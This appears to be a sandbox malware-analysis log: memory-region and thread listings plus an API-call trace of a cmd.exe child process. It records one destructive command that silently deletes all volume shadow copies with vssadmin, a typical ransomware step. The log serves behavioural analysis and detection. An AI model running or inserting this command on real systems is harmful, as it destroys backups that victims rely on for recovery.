Region:
	              id = 2527
	        start_va = 0x4910000
	          end_va = 0x494ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004910000"
	        filename = ""

Region:
	              id = 2528
	        start_va = 0x4a70000
	          end_va = 0x4aaffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004a70000"
	        filename = ""

Region:
	              id = 3043
	        start_va = 0x4ab0000
	          end_va = 0x4b8ffff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")

Region:
	              id = 3050
	        start_va = 0x4b90000
	          end_va = 0x4c0ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004b90000"
	        filename = ""

Region:
	              id = 3059
	        start_va = 0x4950000
	          end_va = 0x4958fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vsstrace.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vsstrace.dll.mui")


Thread:
	id = 78
	os_tid = 0x1094


Thread:
	id = 89
	os_tid = 0x13d4


Thread:
	id = 125
	os_tid = 0x52c


Thread:
	id = 127
	os_tid = 0x31c


Thread:
	id = 130
	os_tid = 0x1b4


Process:
	id = "25"
	image_name = "cmd.exe"
	filename = "c:\\windows\\syswow64\\cmd.exe"
	page_root = "0x30d4b000"
	os_pid = "0x1104"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x117c"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin Delete Shadows /For=S: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 1652
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 1653
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 1654
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 1655
	        start_va = 0x90000
	          end_va = 0x18ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 1656
	        start_va = 0x190000
	          end_va = 0x193fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000190000"
	        filename = ""

Region:
	              id = 1657
	        start_va = 0x1a0000
	          end_va = 0x1a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 1658
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 1659
	        start_va = 0x2f0000
	          end_va = 0x341fff
	       monitored = 1
	     entry_point = 0x304fd0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")

Region:
	              id = 1660
	        start_va = 0x350000
	          end_va = 0x434ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000350000"
	        filename = ""

Region:
	              id = 1661
	        start_va = 0x4350000
	          end_va = 0x4351fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 1662
	        start_va = 0x4400000
	          end_va = 0x45fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004400000"
	        filename = ""

Region:
	              id = 1663
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 1664
	        start_va = 0x7eb30000
	          end_va = 0x7eb52fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007eb30000"
	        filename = ""

Region:
	              id = 1665
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 1666
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 1667
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 1668
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 1669
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 1688
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 1689
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 1690
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 1722
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 1723
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 1724
	        start_va = 0x4600000
	          end_va = 0x47fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 1742
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 1743
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 1786
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 1787
	        start_va = 0x7ea30000
	          end_va = 0x7eb2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007ea30000"
	        filename = ""

Region:
	              id = 2095
	        start_va = 0x200000
	          end_va = 0x2bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 2096
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 2097
	        start_va = 0x4350000
	          end_va = 0x438ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 2098
	        start_va = 0x4600000
	          end_va = 0x46fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 2099
	        start_va = 0x4700000
	          end_va = 0x47fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004700000"
	        filename = ""

Region:
	              id = 2100
	        start_va = 0x4800000
	          end_va = 0x49bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004800000"
	        filename = ""

Region:
	              id = 2106
	        start_va = 0x4390000
	          end_va = 0x4393fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004390000"
	        filename = ""

Region:
	              id = 2151
	        start_va = 0x43a0000
	          end_va = 0x43a3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000043a0000"
	        filename = ""

Region:
	              id = 2182
	        start_va = 0x49c0000
	          end_va = 0x4cf6fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")


Thread:
	id = 80
	os_tid = 0x12fc

	[0245.689] GetProcAddress (hModule=0x76d90000, lpProcName="SetConsoleInputExeNameW") returned 0x746ab440
	[0245.690] GetProcessHeap () returned 0x4700000
	[0245.690] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x400a) returned 0x470b998
	[0245.690] GetProcessHeap () returned 0x4700000
	[0245.691] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x470b998) returned 1
	[0245.692] _wcsicmp (_String1="vssadmin", _String2=")") returned 77
	[0245.692] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16
	[0245.692] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16
	[0245.692] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13
	[0245.692] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13
	[0245.693] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4
	[0245.693] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4
	[0245.693] GetProcessHeap () returned 0x4700000
	[0245.693] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x58) returned 0x47074f8
	[0245.693] GetProcessHeap () returned 0x4700000
	[0245.693] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x1a) returned 0x4709048
	[0245.695] GetProcessHeap () returned 0x4700000
	[0245.695] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x52) returned 0x4709070
	[0245.697] GetConsoleTitleW (in: lpConsoleTitle=0x18f768, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0245.877] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0245.877] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0245.877] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0245.877] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0245.877] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0245.877] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0245.877] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0245.877] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0245.878] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0245.878] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0245.878] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0245.878] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0245.878] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0245.878] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0245.878] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0245.878] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0245.878] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0245.878] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0245.878] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0245.878] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0245.878] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0245.878] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0245.878] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0245.879] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0245.879] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0245.879] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0245.879] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0245.879] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0245.879] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0245.879] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0245.879] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0245.879] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0245.879] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0245.879] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0245.879] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0245.879] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0245.879] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0245.879] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0245.880] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0245.880] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0245.880] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0245.880] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0245.880] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0245.880] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0245.880] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0245.880] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0245.880] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0245.880] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0245.880] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0245.880] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0245.880] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0245.880] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0245.880] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0245.880] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0245.881] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0245.881] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0245.881] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0245.881] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0245.881] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0245.881] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0245.881] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0245.881] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0245.881] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0245.881] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0245.881] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0245.881] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0245.881] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0245.881] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0245.881] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0245.882] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0245.882] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0245.882] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0245.882] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0245.882] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0245.882] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0245.882] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0245.882] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0245.882] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0245.882] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0245.882] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0245.882] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0245.882] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0245.882] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0245.883] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0245.883] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16
	[0245.883] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13
	[0245.883] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4
	[0245.884] GetProcessHeap () returned 0x4700000
	[0245.884] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x210) returned 0x47090d0
	[0245.884] GetProcessHeap () returned 0x4700000
	[0245.884] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x64) returned 0x47092e8
	[0245.884] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19
	[0245.885] GetProcessHeap () returned 0x4700000
	[0245.885] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x418) returned 0x47005c8
	[0245.885] SetErrorMode (uMode=0x0) returned 0x0
	[0245.886] SetErrorMode (uMode=0x1) returned 0x0
	[0245.886] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x47005d0, lpFilePart=0x18f274 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x18f274*="Desktop") returned 0x1d
	[0245.886] SetErrorMode (uMode=0x0) returned 0x1
	[0245.886] GetProcessHeap () returned 0x4700000
	[0245.886] RtlReAllocateHeap (Heap=0x4700000, Flags=0x0, Ptr=0x47005c8, Size=0x56) returned 0x47005c8
	[0245.886] GetProcessHeap () returned 0x4700000
	[0245.886] RtlSizeHeap (HeapHandle=0x4700000, Flags=0x0, MemoryPointer=0x47005c8) returned 0x56
	[0245.886] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x9c
	[0245.886] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0245.887] GetProcessHeap () returned 0x4700000
	[0245.887] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x182) returned 0x4709358
	[0245.887] GetProcessHeap () returned 0x4700000
	[0245.887] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x2fc) returned 0x4700628
	[0246.031] GetProcessHeap () returned 0x4700000
	[0246.031] RtlReAllocateHeap (Heap=0x4700000, Flags=0x0, Ptr=0x4700628, Size=0x184) returned 0x4700628
	[0246.031] GetProcessHeap () returned 0x4700000
	[0246.031] RtlSizeHeap (HeapHandle=0x4700000, Flags=0x0, MemoryPointer=0x4700628) returned 0x184
	[0246.032] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35
	[0246.032] GetProcessHeap () returned 0x4700000
	[0246.032] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0xe0) returned 0x47094e8
	[0246.037] GetProcessHeap () returned 0x4700000
	[0246.037] RtlReAllocateHeap (Heap=0x4700000, Flags=0x0, Ptr=0x47094e8, Size=0x76) returned 0x47094e8
	[0246.037] GetProcessHeap () returned 0x4700000
	[0246.037] RtlSizeHeap (HeapHandle=0x4700000, Flags=0x0, MemoryPointer=0x47094e8) returned 0x76
	[0246.039] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0246.040] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\vssadmin.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18f000, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f000) returned 0xffffffff
	[0246.040] GetLastError () returned 0x2
	[0246.040] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0246.041] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\vssadmin.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18f000, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f000) returned 0xffffffff
	[0246.140] GetLastError () returned 0x2
	[0246.140] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0246.140] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*" (normalized: "c:\\windows\\syswow64\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18f000, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f000) returned 0x4709568
	[0246.140] GetProcessHeap () returned 0x4700000
	[0246.141] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x0, Size=0x14) returned 0x47078d0
	[0246.141] FindClose (in: hFindFile=0x4709568 | out: hFindFile=0x4709568) returned 1
	[0246.141] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM" (normalized: "c:\\windows\\syswow64\\vssadmin.com"), fInfoLevelId=0x1, lpFindFileData=0x18f000, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f000) returned 0xffffffff
	[0246.141] GetLastError () returned 0x2
	[0246.141] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE" (normalized: "c:\\windows\\syswow64\\vssadmin.exe"), fInfoLevelId=0x1, lpFindFileData=0x18f000, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f000) returned 0x4709568
	[0246.142] GetProcessHeap () returned 0x4700000
	[0246.142] RtlReAllocateHeap (Heap=0x4700000, Flags=0x0, Ptr=0x47078d0, Size=0x4) returned 0x4707358
	[0246.142] FindClose (in: hFindFile=0x4709568 | out: hFindFile=0x4709568) returned 1
	[0246.142] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0246.142] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0246.142] GetConsoleTitleW (in: lpConsoleTitle=0x18f4f4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0246.397] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f420, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f404 | out: lpAttributeList=0x18f420, lpSize=0x18f404) returned 1
	[0246.397] UpdateProcThreadAttribute (in: lpAttributeList=0x18f420, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f40c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f420, lpPreviousValue=0x0) returned 1
	[0246.397] GetStartupInfoW (in: lpStartupInfo=0x18f458 | out: lpStartupInfo=0x18f458*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 
	[0246.398] GetProcessHeap () returned 0x4700000
	[0246.398] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x18) returned 0x4707bf0
	[0246.398] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0246.398] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0246.398] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0246.398] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0246.398] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0246.398] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0246.398] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0246.398] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0246.398] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0246.398] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0246.399] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0246.399] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0246.399] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0246.399] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0246.399] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0246.399] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0246.399] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0246.399] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0246.399] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0246.399] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0246.399] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0246.399] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0246.399] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0246.399] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0246.399] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0246.400] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0246.400] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0246.400] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0246.400] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0246.400] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0246.400] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0246.400] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
